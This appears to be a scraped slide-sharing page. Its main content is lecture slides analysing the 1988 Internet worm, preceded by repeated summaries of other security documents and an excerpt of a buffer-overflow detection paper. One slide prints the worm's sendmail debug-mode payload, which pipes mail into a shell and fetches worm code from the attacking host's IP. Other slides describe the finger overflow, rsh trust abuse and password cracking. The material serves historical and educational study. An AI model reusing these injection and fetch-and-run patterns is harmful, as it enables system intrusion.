The document provides an overview of the 1988 Internet worm, including:
- How it exploited vulnerabilities in sendmail, fingerd, and rsh/rexec to spread.
- Its architecture, including population control mechanisms, password cracking, and infection procedures.
- Current internet worms continue to pose threats by spreading malware via vulnerabilities in services like IIS, Apache, and FTP daemons.
International Journal of Engineering Research and Applications (IJERA) is an open access online peer reviewed international journal that publishes research and review articles in the fields of Computer Science, Neural Networks, Electrical Engineering, Software Engineering, Information Technology, Mechanical Engineering, Chemical Engineering, Plastic Engineering, Food Technology, Textile Engineering, Nano Technology & science, Power Electronics, Electronics & Communication Engineering, Computational mathematics, Image processing, Civil Engineering, Structural Engineering, Environmental Engineering, VLSI Testing & Low Power VLSI Design etc.
The document discusses how unprotected Windows file shares can expose systems to exploitation. Malicious software like the Klez worm, Nimda worm, and Sircam virus spread rapidly in 2001 by accessing unprotected shares. The document outlines techniques attackers use like scanning for systems with port 445 open and exploiting weak or null passwords. Examples of malware discussed are the W32/Deloder, GT-bot, and W32/Slackor worms which use these techniques to spread. The document recommends disabling unnecessary shares, using strong unique passwords, and keeping anti-virus software up to date to prevent exploitation.
This document discusses operating system security and roles. It covers system survivability, threats like attacks, failures and accidents. It describes unintentional and intentional intrusions like viruses, worms, Trojans, denial of service attacks and social engineering. It also discusses system protection methods like antivirus software, firewalls, encryption, authentication and passwords. Finally, it touches on ethics and educating users on ethical computer use.
Finding Diversity In Remote Code Injection Exploitsamiable_indian
1. The document analyzes the diversity among remote code injection exploits by collecting exploit samples from network traces, extracting and emulating shellcodes, and clustering the shellcodes based on an exedit distance metric.
2. It finds that exploits can be grouped into families based on the vulnerability targeted. The LSASS and ISystemActivator exploit families show subtle variations among related exploits, while RemoteActivation exploits exhibit more diversity.
3. Analyzing exploit phylogenies reveals code sharing among families and subtle variations within families, providing insights into the emergence of polymorphism in malware payloads.
The Morris Worm was not intended to disable systems but rather to measure total internet users. It spread to over 6000 systems in November 1988 using three infection methods - exploiting vulnerabilities in rsh/rexec, fingerd, and sendmail. While not fully executed, it demonstrated the need for stronger cybersecurity and passwords. It was the first conviction under the Computer Fraud and Abuse Act of 1986.
This document provides an introduction to trojans and backdoors, including what they are, how they work, common types of trojans, and methods of detecting trojan activity. Trojans and backdoors allow hackers to send and receive data through open ports to gain control of systems. Common trojan types include remote access trojans, data sending trojans, and trojans that disable security software. Netstat and Wireshark can be used to monitor network activity and detect trojans. Wrappers and defacing applications help disguise trojans by changing file icons or combining with other programs.
International Journal of Engineering Research and Applications (IJERA) is an open access online peer reviewed international journal that publishes research and review articles in the fields of Computer Science, Neural Networks, Electrical Engineering, Software Engineering, Information Technology, Mechanical Engineering, Chemical Engineering, Plastic Engineering, Food Technology, Textile Engineering, Nano Technology & science, Power Electronics, Electronics & Communication Engineering, Computational mathematics, Image processing, Civil Engineering, Structural Engineering, Environmental Engineering, VLSI Testing & Low Power VLSI Design etc.
The document discusses how unprotected Windows file shares can expose systems to exploitation. Malicious software like the Klez worm, Nimda worm, and Sircam virus spread rapidly in 2001 by accessing unprotected shares. The document outlines techniques attackers use like scanning for systems with port 445 open and exploiting weak or null passwords. Examples of malware discussed are the W32/Deloder, GT-bot, and W32/Slackor worms which use these techniques to spread. The document recommends disabling unnecessary shares, using strong unique passwords, and keeping anti-virus software up to date to prevent exploitation.
This document discusses operating system security and roles. It covers system survivability, threats like attacks, failures and accidents. It describes unintentional and intentional intrusions like viruses, worms, Trojans, denial of service attacks and social engineering. It also discusses system protection methods like antivirus software, firewalls, encryption, authentication and passwords. Finally, it touches on ethics and educating users on ethical computer use.
Finding Diversity In Remote Code Injection Exploitsamiable_indian
1. The document analyzes the diversity among remote code injection exploits by collecting exploit samples from network traces, extracting and emulating shellcodes, and clustering the shellcodes based on an exedit distance metric.
2. It finds that exploits can be grouped into families based on the vulnerability targeted. The LSASS and ISystemActivator exploit families show subtle variations among related exploits, while RemoteActivation exploits exhibit more diversity.
3. Analyzing exploit phylogenies reveals code sharing among families and subtle variations within families, providing insights into the emergence of polymorphism in malware payloads.
The Morris Worm was not intended to disable systems but rather to measure total internet users. It spread to over 6000 systems in November 1988 using three infection methods - exploiting vulnerabilities in rsh/rexec, fingerd, and sendmail. While not fully executed, it demonstrated the need for stronger cybersecurity and passwords. It was the first conviction under the Computer Fraud and Abuse Act of 1986.
This document provides an introduction to trojans and backdoors, including what they are, how they work, common types of trojans, and methods of detecting trojan activity. Trojans and backdoors allow hackers to send and receive data through open ports to gain control of systems. Common trojan types include remote access trojans, data sending trojans, and trojans that disable security software. Netstat and Wireshark can be used to monitor network activity and detect trojans. Wrappers and defacing applications help disguise trojans by changing file icons or combining with other programs.
1Buttercup On Network-based Detection of Polymorphic B.docxaryan532920
1
Buttercup: On Network-based Detection of
Polymorphic Buffer Overflow Vulnerabilities
Archana Pasupulati, Jason Coit, Karl Levitt, S. Felix Wu
Department of Computer Science
University of California, Davis
{pasupula, coit,levitt, wu}@cs.ucdavis.edu
S.H. Li, R.C. Kuo, Kuo-Pao Fan
Computer Communication Labortory
Industry Technology Research Institute
{shli, rckuo}@itri.org.tw
Abstract — Attack polymorphism is a powerful tool for the attackers in the Internet to
evade signature-based intrusion detection/prevention systems. On the other hand, new and faster
Internet worms can be coded and launched easily by even high school students at any moment of
time to against our critical infrastructures such as DNS or update servers. And, we believe that
polymorphic Internet worms will be developed in the future such that many of our current
solutions might have very small chance to survive. In this paper, we propose a simple solution
called “Buttercup” to counter against attacks based on buffer-overflow exploits (such as
CodeRed, Nimda, Slammer, and Blaster). We have implemented our idea in SNORT, and included
19 return address ranges of buffer-overflow exploits. With a suite of tests against 13 TCPdump
traces, the false positive for our best algorithm is as low as 0.01%. This indicates that,
potentially, Buttercup can drop 100% worm attack packets on the wire while only 0.01% of the
good packets will be sacrificed.
I. Introduction
Since a signature-based Network Intrusion Detection System (NIDS) identifies an attack instance
by exactly matching attack signatures against the incoming and outgoing data packets, when the
well-known attacks are modified/transformed differently, the NIDS might fail due to its inability
to match them in its signature database. Sometimes, we call these transformed attacks (but all
from one single original attack signature, for the purpose of IDS evasion) “polymorphic attacks”.
2
In this paper, we propose a new solution to accurately identify one particular type of polymorphic
attacks, known as polymorphic shellcode. Due to the space limitation, solutions for dealing with
other types of polymorphic attacks are discussed in [1].
Under the polymorphic shellcode attacks, the attacker can choose an unknown encryption
algorithm to encrypt the attack code and include the decryption code as part of the attack packet.
The trick to make the whole thing work is to utilize an existing buffer-overflow exploit and to set
the “return” memory address on the over-flowed stack to be the entrance point of the decryption
code module. The attacker can transform every other bit in the packet payload to avoid being
detected by a signature-based IDS, but a critical constraint exists on the range of the “return”
memory address that can be twisted. Our solution, Buttercup, is simply to identify the ranges of
the possible return memory addresses for existing buffer-ov ...
Win32/Blaster was a worm that exploited a vulnerability in Windows RPC to infect systems running Windows 2000 and Windows XP. It installed itself to automatically run on startup and then attempted to infect other systems on the local network and randomly selected IP addresses. The infection process involved exploiting the RPC vulnerability to execute a remote shell, downloading the worm binary, and executing it. It also launched a SYN flooding DDoS attack against Windows Update sites each month after the 16th. The worm spread quickly after the vulnerability was disclosed and highlighted the increasing automation and harm of worms.
Intruders and Viruses in Network Security NS9koolkampus
The document provides an overview of intruders, intrusion techniques, password protection, viruses, and antivirus approaches. It discusses different types of intruders and how they try to guess passwords. It also describes techniques for detecting intrusions and protecting against viruses, including how viruses spread and different types of malicious programs. The document recommends combining signature scanning, heuristic analysis, activity monitoring, and emulation to provide effective antivirus protection.
This document provides a study guide for the Security+ certification exam, covering topics such as:
- Symmetric and asymmetric encryption algorithms including AES, DES, RSA, and Diffie-Hellman.
- Network security devices like firewalls, routers, switches and their functions.
- Common ports and protocols including FTP, SSH, SMTP, HTTP, SNMP, LDAP.
- Authentication methods like Kerberos, CHAP, certificates, usernames/passwords and tokens.
- Other security concepts and attacks like hashing, PKI, DoS, spoofing, replay and man-in-the-middle.
- Access controls including MAC, DAC, RBAC and their characteristics.
The document discusses several topics related to computer security including message passing between processes, types of messaging (reliable vs unreliable, synchronous vs asynchronous), malware examples like rootkits and hijackers, cryptology functions for encrypting passwords, and security aspects of the Android operating system like privilege separation and file access restrictions for applications.
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....Shah Sheikh
This document introduces BetWorm, a defensive worm created by the author to perform penetration testing and security assessments from an attacker's perspective within an organization's internal network. BetWorm spreads through authenticated SSH connections and maps vulnerable systems by collecting information, detecting weaknesses, analyzing attack surfaces, and emulating malicious connections. The author explains how BetWorm currently functions and future plans to improve its abilities to more quickly scan networks, save collected data to a command and control server, include a local web server, support both Linux and Windows, and provide a graphical user interface. A link is provided to access BetWorm's source code on GitHub.
IP spoofing is a technique used to gain unauthorized access to computers or networks by disguising the originating IP address. The goal is to make it appear the traffic is coming from a trusted IP address.
This document discusses reverse shell and bind shell attacks. It explains the key steps to perform these attacks using Metasploit and Meterpreter. These include backdooring files with payloads, launching listeners, sending infected files to victims, and gaining shell access. It also provides examples of post-exploitation scripts that can be used for tasks like taking screenshots, keylogging, and privilege escalation on compromised systems.
This document discusses various types of denial of service (DoS) and distributed denial of service (DDoS) attacks, including their characteristics and techniques. It provides examples of specific DoS attacks like Smurf, Teardrop, Ping of Death and SYN attacks. The document also covers buffer overflow vulnerabilities and SQL injection attacks. It discusses countermeasures to mitigate these threats.
1. Network probes scan computer networks to gather information about services and vulnerabilities which can enable future attacks.
2. Privilege escalation attacks exploit software bugs to gain higher levels of access on a system, such as ordinary users accessing root privileges.
3. Denial of service (DoS) and distributed denial of service (DDoS) attacks aim to overwhelm network or system resources to interfere with normal operations.
A computer worm is a self-replicating malware program that spreads across a network without user intervention by exploiting security vulnerabilities. Worms replicate by using network resources which can slow networks and systems. While some are designed only to spread, others have payloads that can delete files, encrypt files in ransomware attacks, or install backdoors for remote control in botnets. Protecting against worms involves keeping systems patched, using antivirus software, firewalls, and avoiding opening unexpected email attachments or visiting unknown websites.
A computer worm is a self-replicating malware program that spreads across a network without user intervention by exploiting security vulnerabilities. Worms replicate by using network resources which can slow networks and systems. While some are designed only to spread, others have payloads that can delete files, encrypt files in ransomware attacks, or install backdoors for remote control in botnets. Protecting against worms involves keeping systems patched, using antivirus software, firewalls, and avoiding opening unexpected email attachments or visiting unknown websites. The first modern worm was the 1988 Morris worm which disrupted about 10% of Internet-connected computers.
Packet sniffing tools like Ethereal and Snort can be used to intercept network traffic for diagnostic or malicious purposes. Sniffing tools capture packets in either command line or GUI format and some can reassemble packets into original data like emails. Sniffing can reveal usernames, passwords, and other confidential information unless encryption is used. Common sniffing techniques include passive sniffing using hubs, active sniffing using ARP spoofing on switches, and MAC flooding to force switch traffic to a sniffer. Encryption renders captured data useless, while detection tools can find machines in promiscuous sniffing mode.
This document discusses various internet security threats such as viruses, worms, rootkits, scanners, IP spoofing, session hijacking, and botnet attacks. It also covers basic concepts of DNS, how TCP connections are established, and definitions of denial of service attacks. Specific techniques like passive and active session hijacking and how botnets function through command and control centers are described in more detail.
This document discusses various internet security threats such as viruses, worms, rootkits, scanners, IP spoofing, session hijacking, and botnet attacks. It also covers basic concepts of DNS, how TCP connections are established, and types of denial of service attacks. Specific techniques like passive and active session hijacking and how botnets use command and control infrastructures are described in more detail.
This document discusses various types of cyber attacks and threats such as viruses, worms, Trojan horses, botnets, trap doors, logic bombs, denial of service attacks, and spyware. It provides details on the characteristics and techniques of different attacks, including how viruses, worms, and Trojan horses infect systems. Distributed denial of service (DDoS) attacks are explained along with specific DDoS techniques like SYN floods and Smurf attacks. The document is a lecture on cryptography and network security that outlines different cyber threats.
This document discusses different types of malicious software including viruses, trojan horses, worms, and spyware. It provides details on how each type spreads and the harm they can cause. Viruses spread by infecting other files or programs and can corrupt data or disrupt systems. Trojan horses disguise harmful programs as legitimate ones. Worms replicate across networks and can delete files or disrupt systems. The document outlines strategies for prevention, detection, and removal of malicious software.
Enabling Worm and Malware Investigation Using Virtualizationamiable_indian
This document discusses using virtualization to enable worm and malware investigation. It presents Collapsar as a front-end for distributed and centralized honeypot operation, aggregating unused IP addresses. It also presents vGround as a back-end for enabling large-scale, live but confined worm experiments through virtualization. Together, Collapsar and vGround form an integrated platform for automated worm characterization, zero-day signature generation, and tracking worm contaminations.
The impact of a malware infection can be increased by applying 'lateral movement': spreading the infection from the original infected device to other devices within the same network.This paper shares the technical details of some of the most common spreading techniques used by malware, both within the network and to other networks
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...APNIC
Adli Wahid, Senior Internet Security Specialist at APNIC, delivered a presentation titled 'Honeypots Unveiled: Proactive Defense Tactics for Cyber Security' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
1Buttercup On Network-based Detection of Polymorphic B.docxaryan532920
1
Buttercup: On Network-based Detection of
Polymorphic Buffer Overflow Vulnerabilities
Archana Pasupulati, Jason Coit, Karl Levitt, S. Felix Wu
Department of Computer Science
University of California, Davis
{pasupula, coit,levitt, wu}@cs.ucdavis.edu
S.H. Li, R.C. Kuo, Kuo-Pao Fan
Computer Communication Labortory
Industry Technology Research Institute
{shli, rckuo}@itri.org.tw
Abstract — Attack polymorphism is a powerful tool for the attackers in the Internet to
evade signature-based intrusion detection/prevention systems. On the other hand, new and faster
Internet worms can be coded and launched easily by even high school students at any moment of
time to against our critical infrastructures such as DNS or update servers. And, we believe that
polymorphic Internet worms will be developed in the future such that many of our current
solutions might have very small chance to survive. In this paper, we propose a simple solution
called “Buttercup” to counter against attacks based on buffer-overflow exploits (such as
CodeRed, Nimda, Slammer, and Blaster). We have implemented our idea in SNORT, and included
19 return address ranges of buffer-overflow exploits. With a suite of tests against 13 TCPdump
traces, the false positive for our best algorithm is as low as 0.01%. This indicates that,
potentially, Buttercup can drop 100% worm attack packets on the wire while only 0.01% of the
good packets will be sacrificed.
I. Introduction
Since a signature-based Network Intrusion Detection System (NIDS) identifies an attack instance
by exactly matching attack signatures against the incoming and outgoing data packets, when the
well-known attacks are modified/transformed differently, the NIDS might fail due to its inability
to match them in its signature database. Sometimes, we call these transformed attacks (but all
from one single original attack signature, for the purpose of IDS evasion) “polymorphic attacks”.
2
In this paper, we propose a new solution to accurately identify one particular type of polymorphic
attacks, known as polymorphic shellcode. Due to the space limitation, solutions for dealing with
other types of polymorphic attacks are discussed in [1].
Under the polymorphic shellcode attacks, the attacker can choose an unknown encryption
algorithm to encrypt the attack code and include the decryption code as part of the attack packet.
The trick to make the whole thing work is to utilize an existing buffer-overflow exploit and to set
the “return” memory address on the over-flowed stack to be the entrance point of the decryption
code module. The attacker can transform every other bit in the packet payload to avoid being
detected by a signature-based IDS, but a critical constraint exists on the range of the “return”
memory address that can be twisted. Our solution, Buttercup, is simply to identify the ranges of
the possible return memory addresses for existing buffer-ov ...
Win32/Blaster was a worm that exploited a vulnerability in Windows RPC to infect systems running Windows 2000 and Windows XP. It installed itself to automatically run on startup and then attempted to infect other systems on the local network and randomly selected IP addresses. The infection process involved exploiting the RPC vulnerability to execute a remote shell, downloading the worm binary, and executing it. It also launched a SYN flooding DDoS attack against Windows Update sites each month after the 16th. The worm spread quickly after the vulnerability was disclosed and highlighted the increasing automation and harm of worms.
Intruders and Viruses in Network Security NS9koolkampus
The document provides an overview of intruders, intrusion techniques, password protection, viruses, and antivirus approaches. It discusses different types of intruders and how they try to guess passwords. It also describes techniques for detecting intrusions and protecting against viruses, including how viruses spread and different types of malicious programs. The document recommends combining signature scanning, heuristic analysis, activity monitoring, and emulation to provide effective antivirus protection.
This document provides a study guide for the Security+ certification exam, covering topics such as:
- Symmetric and asymmetric encryption algorithms including AES, DES, RSA, and Diffie-Hellman.
- Network security devices like firewalls, routers, switches and their functions.
- Common ports and protocols including FTP, SSH, SMTP, HTTP, SNMP, LDAP.
- Authentication methods like Kerberos, CHAP, certificates, usernames/passwords and tokens.
- Other security concepts and attacks like hashing, PKI, DoS, spoofing, replay and man-in-the-middle.
- Access controls including MAC, DAC, RBAC and their characteristics.
The document discusses several topics related to computer security including message passing between processes, types of messaging (reliable vs unreliable, synchronous vs asynchronous), malware examples like rootkits and hijackers, cryptology functions for encrypting passwords, and security aspects of the Android operating system like privilege separation and file access restrictions for applications.
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....Shah Sheikh
This document introduces BetWorm, a defensive worm created by the author to perform penetration testing and security assessments from an attacker's perspective within an organization's internal network. BetWorm spreads through authenticated SSH connections and maps vulnerable systems by collecting information, detecting weaknesses, analyzing attack surfaces, and emulating malicious connections. The author explains how BetWorm currently functions and future plans to improve its abilities to more quickly scan networks, save collected data to a command and control server, include a local web server, support both Linux and Windows, and provide a graphical user interface. A link is provided to access BetWorm's source code on GitHub.
IP spoofing is a technique used to gain unauthorized access to computers or networks by disguising the originating IP address. The goal is to make it appear the traffic is coming from a trusted IP address.
This document discusses reverse shell and bind shell attacks. It explains the key steps to perform these attacks using Metasploit and Meterpreter. These include backdooring files with payloads, launching listeners, sending infected files to victims, and gaining shell access. It also provides examples of post-exploitation scripts that can be used for tasks like taking screenshots, keylogging, and privilege escalation on compromised systems.
This document discusses various types of denial of service (DoS) and distributed denial of service (DDoS) attacks, including their characteristics and techniques. It provides examples of specific DoS attacks like Smurf, Teardrop, Ping of Death and SYN attacks. The document also covers buffer overflow vulnerabilities and SQL injection attacks. It discusses countermeasures to mitigate these threats.
1. Network probes scan computer networks to gather information about services and vulnerabilities which can enable future attacks.
2. Privilege escalation attacks exploit software bugs to gain higher levels of access on a system, such as ordinary users accessing root privileges.
3. Denial of service (DoS) and distributed denial of service (DDoS) attacks aim to overwhelm network or system resources to interfere with normal operations.
A computer worm is a self-replicating malware program that spreads across a network without user intervention by exploiting security vulnerabilities. Worms replicate by using network resources which can slow networks and systems. While some are designed only to spread, others have payloads that can delete files, encrypt files in ransomware attacks, or install backdoors for remote control in botnets. Protecting against worms involves keeping systems patched, using antivirus software, firewalls, and avoiding opening unexpected email attachments or visiting unknown websites.
A computer worm is a self-replicating malware program that spreads across a network without user intervention by exploiting security vulnerabilities. Worms replicate by using network resources which can slow networks and systems. While some are designed only to spread, others have payloads that can delete files, encrypt files in ransomware attacks, or install backdoors for remote control in botnets. Protecting against worms involves keeping systems patched, using antivirus software, firewalls, and avoiding opening unexpected email attachments or visiting unknown websites. The first modern worm was the 1988 Morris worm which disrupted about 10% of Internet-connected computers.
Packet sniffing tools like Ethereal and Snort can be used to intercept network traffic for diagnostic or malicious purposes. Sniffing tools capture packets in either command line or GUI format and some can reassemble packets into original data like emails. Sniffing can reveal usernames, passwords, and other confidential information unless encryption is used. Common sniffing techniques include passive sniffing using hubs, active sniffing using ARP spoofing on switches, and MAC flooding to force switch traffic to a sniffer. Encryption renders captured data useless, while detection tools can find machines in promiscuous sniffing mode.
This document discusses various internet security threats such as viruses, worms, rootkits, scanners, IP spoofing, session hijacking, and botnet attacks. It also covers basic concepts of DNS, how TCP connections are established, and definitions of denial of service attacks. Specific techniques like passive and active session hijacking and how botnets function through command and control centers are described in more detail.
This document discusses various internet security threats such as viruses, worms, rootkits, scanners, IP spoofing, session hijacking, and botnet attacks. It also covers basic concepts of DNS, how TCP connections are established, and types of denial of service attacks. Specific techniques like passive and active session hijacking and how botnets use command and control infrastructures are described in more detail.
This document discusses various types of cyber attacks and threats such as viruses, worms, Trojan horses, botnets, trap doors, logic bombs, denial of service attacks, and spyware. It provides details on the characteristics and techniques of different attacks, including how viruses, worms, and Trojan horses infect systems. Distributed denial of service (DDoS) attacks are explained along with specific DDoS techniques like SYN floods and Smurf attacks. The document is a lecture on cryptography and network security that outlines different cyber threats.
This document discusses different types of malicious software including viruses, trojan horses, worms, and spyware. It provides details on how each type spreads and the harm they can cause. Viruses spread by infecting other files or programs and can corrupt data or disrupt systems. Trojan horses disguise harmful programs as legitimate ones. Worms replicate across networks and can delete files or disrupt systems. The document outlines strategies for prevention, detection, and removal of malicious software.
Enabling Worm and Malware Investigation Using Virtualizationamiable_indian
This document discusses using virtualization to enable worm and malware investigation. It presents Collapsar as a front-end for distributed and centralized honeypot operation, aggregating unused IP addresses. It also presents vGround as a back-end for enabling large-scale, live but confined worm experiments through virtualization. Together, Collapsar and vGround form an integrated platform for automated worm characterization, zero-day signature generation, and tracking worm contaminations.
The impact of a malware infection can be increased by applying 'lateral movement': spreading the infection from the original infected device to other devices within the same network.This paper shares the technical details of some of the most common spreading techniques used by malware, both within the network and to other networks
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...APNIC
Adli Wahid, Senior Internet Security Specialist at APNIC, delivered a presentation titled 'Honeypots Unveiled: Proactive Defense Tactics for Cyber Security' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
HijackLoader Evolution: Interactive Process HollowingDonato Onofri
CrowdStrike researchers have identified a HijackLoader (aka IDAT Loader) sample that employs sophisticated evasion techniques to enhance the complexity of the threat. HijackLoader, an increasingly popular tool among adversaries for deploying additional payloads and tooling, continues to evolve as its developers experiment and enhance its capabilities.
In their analysis of a recent HijackLoader sample, CrowdStrike researchers discovered new techniques designed to increase the defense evasion capabilities of the loader. The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe. This new approach, called "Interactive Process Hollowing", has the potential to make defense evasion stealthier.
Securing BGP: Operational Strategies and Best Practices for Network Defenders...APNIC
Md. Zobair Khan,
Network Analyst and Technical Trainer at APNIC, presented 'Securing BGP: Operational Strategies and Best Practices for Network Defenders' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
1. Eugene H. Spafford, "The Internet Worm
Program: An Analysis"
Presented by Petko Bakalov
University of California - Riverside
pbakalov@cs.ucr.edu
2. Roadmap
• Introduction
• Worm Description
– Security Holes Exploited
– Design of the worm
• Proposed defense
• Current state
• Discussion
3. Resent e-mail
Subject: [Staff] URGENT - Email Mass Mailing Virus hitting UCR
Date: Mon, 26 Jan 2004 16:04:48 -0800
From: Phyllis Bruce <phyllis.bruce@ucr.edu>
To: staff@scotmail.ucr.edu
To All Staff: Urgent - a mass mailing worm has hit the internet today as
many of you may now know, the name of it according to McAfee is
W32/Mydoom@MM. Currently, McAfee AntiVirus has detected the
type of virus threat, here is the information we have learned so far:
4. Definition - What is Worm
• Self propagating/replicating code that uses infected host as a platform
to attack other systems
• Can spread fast causing epidemic-like outbreaks that wreak havoc on
networks and hosts
5. Black Thursday - Chronology I
11/2:18:00 (approx.) This date and time of worm files found on
prep.ai.mit.edu, a VAX 11/750 at the MIT Artificial Intelligence
Lab. It is supposed that the attack began from here
11/2:18:24 rand.org at Rand Corp. in Santa Monica - First known
West Coast infection.
11/2: 20:49 cs.utah.edu is infected. The machine is VAX 8600.
Several hours after the infection the load average of the server
reached 16. Typically at this time it is between 0.5 and 2.
6. Black Thursday - Chronology II
11/2: 23:28 Peter Yee at NASA Ames Research Center suggests
turning off telnet, ftp, finger, rsh and SMTP services.
11/3: 02:54 Keith Bostic sends a fix for sendmail to the newsgroup
comp.bugs.4bsd.ucb-fixes and to the TCP-IP mailing list.
11/3 :15:00 (approx.) The team at MIT Athena calls Berkeley with
an example of how the finger server bug works.
11/4: 12:36 MIT and Berkeley have completely disassembled the
worm
7. Security Holes Exploited
The basic object of the worm is to get a shell on another machine
so it can reproduce further. Tree ways of attack:
sendmail.
fingerd.
rsh/rexec.
8. Sendmail attack - I
Door resulted from two distinct 'features' that, although innocent
by themselves, were deadly when combined.
sendmail permits mail to be delivered to processes instead of
mailbox files
sendmail is compiled with the DEBUG flag, and it permits
sender to pass in a command sequence instead of a user name
for a recipient.
The worm opens a TCP connection to victim's sendmail, invokes
debug mode, and sends a RCPT TO that requests its data be piped
through a shell. That data, a shell script (first-stage bootstrap)
creates and compiles temporary second-stage bootstrap - C
program. This C program sucks the object files from the attacking
host and compiles them.
9. Sendmail attack - II
debug
mail from: </dev/null>
rcpt to: <"|sed -e ’1,/^$/’d | /bin/sh ; exit 0">
data
cd /usr/tmp
cat > x14481910.c <<’EOF’
[text of vector program—second-stage bootstrap ]
EOF
cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341
8712440;
rm -f x14481910 x14481910.c
.
quit
10. Finger attack - I
Finger reports information about a user on a host - it reads a
request from the originating host, then runs the local finger
program with the request as an argument and ships the output
back.
The finger server reads the remote request with gets() which does
not check for overflow of the buffer. The worm supplies the finger
server with a request that is bigger than the buffer and in this way
write over the server's stack frame for the main routine.
On a VAX, the worm knew how much further from the stack it had
to clobber to get command to be executed "/usr/ucb/finger", which
it replaced with the command "/bin/sh" . So instead of the finger
command being executed, a shell was started.
12. Rsh rexec attack
Rsh and rexec are network services which offer remote command
interpreters. Rexec uses password authentication; rsh relies on a
"privileged" originating port and permissions files.
The worm exploit two types of vulnerabilities
likelihood that both accounts on the remote and on the local
machines will have the same password
likelihood that a remote account will include the local host in
its rsh permissions files
There are some files in the local host exploited by the worm
forward - contains an address to which mail is forwarded
rhosts - list of hosts on those hosts which are granted
permission to access the local machine with rsh
13. Worm architecture - doit
Setup state of the worm
initializations
change its name
initialize the worm's list of network interfaces
defense
turns off core dumps
zeroes out its argument list
cleanup
arranges to die when remote connections fail
removes each file after it reads it.
Call doit function
14. Worm architecture - doit
doit()
{
seed the random number generator with the time
attack hosts: gateways, local nets, remote nets
checkother();
send message();
for (;;)
{
cracksome();
other_sleep(30);
cracksome();
change our process ID
attack hosts: gateways, known hosts,local nets
other_sleep(120);
if (12 hours have passed)
reset hosts table
if (pleasequit && nextw > 10)
exit(0);
}
}
15. Worm architecture - doit
checkother() - check for another worm already on the local
machine.
send_message() - odd routine intended to cause 1 in 15 copies to
send a message to a port on the host ernie.berkeley.edu
cracksome() - password cracking
other_sleep() - communication with another worm
If 12 hours have passed and the worm is still alive it reinitializes
its table of hosts
At the end of the main loop the worm checks to see if it is
scheduled to die as a result of its population control features, and if
it is, and if it has done a sufficient amount of work cracking
passwords, it exits.
16. Worm architecture - population control
The worm contains a mechanism that was designed to limit the
number of copies of the worm running on a given system.
This system clearly does not prevent a system from being
overloaded
The worm uses a client-and-server technique to control the number
of copies executing on the current machine. It uses TCP port
23357 on the local host. In the beginning the worm tries to connect
to this port.
If it is not successful this means that there is no other worm on
the same machine. The worm becomes server.
Otherwise there is another worm in this machine.
17. Worm architecture - population control
If there is another worm client exchanges magic numbers with the
server as a trivial form of authentication and the client and the
server roll dice to see who gets to survive
The loser sets a flag pleasequit in order to exit at the bottom of the
main loop.
One culprit is the 1 in 7 test in checkother(): worms that skip the
client phase become immortal, and thus don't risk being eliminated
by a roll of the dice.
Thus the worm finishes the population game in one of three states:
scheduled to die after some time, with pleasequit set;
running as a server, with the possibility of losing the game later
immortal, safe from the gamble of population control.
18. Worm architecture - Choosing new targets
One of the characteristics of the worm is that all of its attacks are
active - do not depend on user to propagate.
There is distinct list of priorities when hunting for hosts
Its favorite hosts are gateways; the hg() routine tries to infect
each of the hosts it believes to be gateways.
the worm's next priority is hosts whose names were found in a
scan of system files
etc/hosts.equiv - contains names of hosts to which the local
host grants user permissions without authentication
rhosts - which contains names of hosts from which the
local host permits remote privileged logins
19. Worm architecture - Choosing new targets
forward files - list hosts to which mail is forwarded from
the current host
worm starts looking for hosts that aren't recorded in files.
hl() checks local networks: it runs through the local host's
addresses, masking off the host part and substituting a
random value.
ha() does the same job for remote hosts, checking alternate
addresses of gateways.
20. Worm architecture - Infection procedure
The worm uses two favorite routines when it decides that it wants
to infect a host.
infect() is used from host scanning routines. This routine first
checks that it isn't infecting the local machine, an already
infected machine or a machine previously attacked but not
successfully infected. It uses "infected" and "immune" states.
Then comes a series of attacks:
rsh from the account that the worm is running under,
finger
sendmail.
21. Worm architecture - Infection procedure
The other infection routine is named hul() and it is run from
the password cracking code after a password has been guessed.
potential remote user name is available from a .forward or
.rhosts file
If a remote user name is unavailable the worm uses the
local user name
it contacts the rexec server on the target host and tries to
authenticate itself
If it can, it proceeds to the bootstrap phase
If not - it tries reverse rexec to the host
22. Worm architecture - Infection procedure
Both infect() and hul() use a routine sendworm() -
looks for the ll.c bootstrap source file in its objects list
uses the makemagic() routine to get a communication stream
endpoint (a socket), a random network port number to
rendezvous at, and a magic number for authentication.
Sends across the bootstrap source. The bootstrap source is
compiled and run on the remote system
When a connection is successful, the worm ships all of its files
across
It pauses four seconds to let a command interpreter start on the
remote side, then it issues commands to create a new worm.
23. Worm architecture - Password cracking
Guessing passwords. The worm's password guessing is driven by a
little 4-state machine. The first state gathers password data, while
the remaining states represent increasingly less likely sources of
potential passwords.
crack_0() collect information about hosts and accounts.
crack_1() looks for trivially broken passwords (the account
name, the account name concatenated with itself, the first name
)
crack_2(). In this state the worm compares a list of favorite
passwords
crack_3(). It opens the UNIX online dictionary /usr/dict/words
and goes through it one word at a time.
24. Worm architecture - Password cracking
Faster password encryption. The worm's crypt() algorithm appears
to be a compromise between time and space.
Advantages of the worm encryption :
worm's algorithm to use bit-field and shift operations on the
password data
precomputing shifts and masks
The biggest performance improvement comes as a result of
combining permutations: the worm uses expanded arrays
which are indexed by groups of bits rather than the single bits
used by the standard algorithm
25. Worm architecture - Password cracking
Result: The worm's version of the UNIX crypt() routine ran more
than 9 times faster than the standard version when it was tested
VAX 8600. While the standard crypt() takes 54 seconds to encrypt
271 passwords on our 8600 (the number of passwords actually
contained in our password file), the worm's crypt() takes less than
6 seconds.
26. Worm architecture - Defense
How can system administrators defend against fast
implementations of crypt()? One suggestion that has been
introduced is the idea of shadow password files. In this scheme,
the encrypted passwords are hidden rather than public, forcing a
cracker to either
break a privileged account
use the host's CPU and (slow) encryption algorithm to attack,
with the added danger that password test requests could be
logged and password cracking discovered.
27. Current status
Purposes Vary:
•Denial of Service: CodeRed
•Backdoor: CodeRedII left the system up for grabs
•Replace/Remail: Nimda replaced common file types
•Nothing: Kournikova spread to everyone you know
